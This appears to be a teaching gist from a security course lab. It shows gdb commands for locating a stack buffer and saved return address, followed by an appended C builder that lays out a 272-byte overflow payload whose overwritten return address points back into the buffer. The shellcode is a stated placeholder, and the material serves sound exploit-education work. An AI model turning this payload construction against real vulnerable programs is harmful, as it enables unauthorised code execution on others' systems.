

@jelc53
Last active April 8, 2023 05:22
gdb commands to interrogate stackframe
# -----------------------------------------------------------------------------------------
# Example application of gdb to understand address logic of buffer overflow exploit
# Our exploit builds a buffer, writes it to a file, then execs the target with that file as its argument
# The target copies the file into a fixed-size stack buffer (overflowing it); the overwritten return
# address sends execution back into the data from the file, which opens a shell
# -----------------------------------------------------------------------------------------
# First compile everything ----------------------------------------------------------------
cd proj1/xploits/
make
# Second, run in debugger -----------------------------------------------------------------
# To do this, run gdb on the compiled executable
gdb ./xploit1 # start GNU gdb on the exploit binary
(gdb) b foo # set breakpoint at the vulnerable function
Function "foo" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (foo) pending.
# foo lives in target1, not in xploit1, so the breakpoint stays pending until the target is exec'd
(gdb) r # run the program
Starting program: /home/user/proj1/xploits/xploit1
process 1129 is executing new program: /tmp/target1
Breakpoint 1, foo (input=0x7fffffffdd40 "") at target1.c:16
16 bar(input, buf);
(gdb) n # next line of code
(gdb) ni # next assembly instruction
# Third, investigate stack frame ----------------------------------------------------------
(gdb) layout src # shows view window with source code
(gdb) layout asm # shows view window with assembly code
Ctrl-x a # toggle the TUI, i.e. exit from the source/asm view
(gdb) p &buf # print address of buffer variable
$1 = (char (*)[256]) 0x7fffffffdc20
(gdb) info frame # view contents of stack frame
Stack level 0, frame at 0x7fffffffdd30:
rip = 0x5555555551d1 in foo (target1.c:16); saved rip = 0x5555555552c4
called by frame at 0x7fffffffed60
source language c.
Arglist at 0x7fffffffdd20, args: input=0x7fffffffdd40 ""
Locals at 0x7fffffffdd20, Previous frames sp is 0x7fffffffdd30
Saved registers:
rbp at 0x7fffffffdd20, rip at 0x7fffffffdd28
# Note for interpreting info frame console output:
# - rip = 0x5555555551d1 is the address of the instruction being executed; it lives in the
#   program's text (code) segment, not on the stack
# - saved rip = 0x5555555552c4 is the return address of this frame, i.e. where foo returns into its caller
# - "Saved registers" lists where on the stack the caller's rbp and the return address were pushed
#   (rbp at 0x7fffffffdd20, rip at 0x7fffffffdd28, directly above the locals)
# To confirm that the stack slot at 0x7fffffffdd28 holds the saved rip (return address), run the following
(gdb) x/gx 0x7fffffffdd28 # x = examine, /gx = one giant word (8 bytes) in hex, at the given address
0x7fffffffdd28: 0x00005555555552c4
# Fourth, address pointer arithmetic ---------------------------------------------------------
# Want to understand how many bytes we must write to reach and overwrite the return address
# To find this, subtract the address of our buffer local variable from the address where ret is stored
(gdb) p/x 0x7fffffffdd28 - 0x7fffffffdc20 # distance between the two addresses, as hex
$3 = 0x108
(gdb) p 0x7fffffffdd28 - 0x7fffffffdc20 # same distance, as decimal
$4 = 264 # 264 bytes from the base of buf to the start of the saved-rip slot
# That is the 256-byte buffer plus the 8-byte saved rbp at 0x7fffffffdd20, so the return address
# begins exactly 264 bytes into the overflow; to replace all 8 bytes of it the payload must be
# 264 + 8 = 272 bytes long (264 bytes of filler, then the new return address)
# Additional tips and tricks -----------------------------------------------------------------
# When checking to see if we've done the arithmetic correctly
# try filling buffer with memset(exploit, 'U', sizeof(exploit));
# re-compile xploit code and run to confirm we get a seg fault
$ ./xploit1
Segmentation fault
# Now, want to fill exploit with a well-chosen ret (points back inside buf, where our code sits)
# and a payload that executes useful code
memcpy(exploit, shellcode, sizeof(shellcode)-1); # shellcode is a C string literal, so sizeof counts its NUL terminator; -1 drops it
# note, don't want the null terminator inside the payload because it makes the target's string copy
# think it has found the end of the string and stop early, before the return address is reached
# The stack addresses above were read inside gdb, which disables ASLR by default; they only hold
# outside the debugger if randomization is off for the system as well
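The arithmetic from the two sections above, carried through in code. This is an added example, not part of the gist or of the course project it refers to: it takes the two addresses read in the gdb session (0x7fffffffdc20 for buf, 0x7fffffffdd28 for the saved rip), lays out the 272-byte overflow string, and checks it for early NUL bytes before writing it out. The shellcode bytes are a constructed placeholder (NOPs plus an int3), not a working shell payload, and the output file name "badfile" is an assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses copied from the gdb session above (only valid with ASLR off). */
#define BUF_ADDR 0x7fffffffdc20ULL  /* (gdb) p &buf */
#define RET_SLOT 0x7fffffffdd28ULL  /* "rip at 0x7fffffffdd28" from info frame */

/* Placeholder bytes standing in for real shellcode (constructed, NOT a working
 * shell payload): four NOPs and an int3 so a hit is visible under gdb. */
static const unsigned char g_shellcode[] = { 0x90, 0x90, 0x90, 0x90, 0xcc };

/* Scratch buffer large enough for the 272-byte payload plus a terminator. */
static unsigned char g_payload[512];

/* Lay out the overflow string:
 *   [shellcode][filler 'U' ... up to the saved-rip slot][ret_target, little-endian][NUL]
 * Returns the payload length (bytes before the NUL), or 0 if the inputs are inconsistent. */
size_t build_exploit(unsigned char *out, size_t out_len,
                     const unsigned char *sc, size_t sc_len,
                     uint64_t buf_addr, uint64_t ret_slot, uint64_t ret_target)
{
    if (ret_slot <= buf_addr)                   /* the slot must lie above the buffer */
        return 0;
    size_t off = (size_t)(ret_slot - buf_addr); /* 264 for this target */
    size_t total = off + sizeof(uint64_t);      /* 272: filler + 8-byte address */
    if (out_len < total + 1 || sc_len > off)    /* room for a NUL; shellcode fits below the slot */
        return 0;

    memset(out, 'U', off);          /* fills buf and the saved rbp, like the seg-fault check */
    memcpy(out, sc, sc_len);        /* shellcode at the base of buf, where ret will point */
    for (size_t i = 0; i < sizeof(uint64_t); i++)   /* x86-64 stores the address little-endian */
        out[off + i] = (unsigned char)(ret_target >> (8 * i));
    out[total] = '\0';
    return total;
}

/* The target copies the file with strcpy semantics, so the copy stops at the first 0x00.
 * Returns its index within the first n bytes, or -1 if there is none. */
long first_nul(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    size_t n = build_exploit(g_payload, sizeof g_payload, g_shellcode, sizeof g_shellcode,
                             BUF_ADDR, RET_SLOT, BUF_ADDR);
    if (n == 0) {
        fprintf(stderr, "inconsistent addresses\n");
        return 1;
    }
    long z = first_nul(g_payload, n);
    printf("payload %zu bytes, ret slot at offset %llu, first NUL at %ld\n",
           n, (unsigned long long)(RET_SLOT - BUF_ADDR), z);
    /* Only the two high bytes of the 0x00007fff... address may be zero; a NUL any
     * earlier would truncate the copy before the return address is reached. */
    if (z >= 0 && (size_t)z < n - 2) {
        fprintf(stderr, "NUL inside payload at %ld: strcpy would truncate\n", z);
        return 1;
    }
    FILE *f = fopen("badfile", "wb");   /* assumed name of the file handed to target1 */
    if (!f || fwrite(g_payload, 1, n, f) != n) {
        perror("badfile");
        return 1;
    }
    fclose(f);
    return 0;
}
```

The return address has to be the last thing in the payload because a user-space stack address on x86-64 (0x00007fff...) carries two zero bytes in its top positions; the copy stops at the first of them, which is harmless only because the original saved rip (0x00005555555552c4) already has a zero top byte. Running the builder with the slot and buffer addresses swapped, or with too small an output buffer, returns 0 instead of producing a wrong-length string.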